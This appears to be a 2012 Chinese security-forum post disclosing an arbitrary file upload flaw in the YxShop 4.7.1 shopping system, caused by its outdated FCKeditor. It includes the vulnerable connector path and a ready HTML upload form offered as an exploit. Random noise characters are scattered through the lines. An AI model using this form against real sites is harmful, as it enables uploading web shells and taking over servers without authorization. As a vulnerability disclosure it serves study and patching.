中国网络渗透测试联盟

标题: YxShop易想购物商城4.7.1版本任意文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 20:46
标题: YxShop易想购物商城4.7.1版本任意文件上传漏洞
披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中, ~& w3 L7 P' `# Y
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开8 y: W7 s* ]3 e. A1 z& P
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
2 L. b" z' ?- F# Y: r: _ 详细说明:其他版本我没测试,估计也是一样的问题
% c( ~2 T/ l# j& U http://127.0.0.1/controls/fckedi ... aspx/connector.aspx% e6 Y# p( Z4 s! V' p5 B
跳转到网站根目录上传任意文件。7 l0 a6 T& U, \1 n1 Z5 r8 Z
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件7 B/ I4 |1 y5 s: m) h8 I9 B% ~
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
' {. \# ]+ p' ^: w( P: g2 \1 [ Upload a new file:<br>7 M1 B, n; n4 a# J1 \( j* a
<input type="file" name="NewFile" size="50"><br>
  W: K3 G! e/ V- D: U1 I <input id="btnUpload" type="submit" value="Upload">% f8 D6 P' c; R$ `
</form>



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2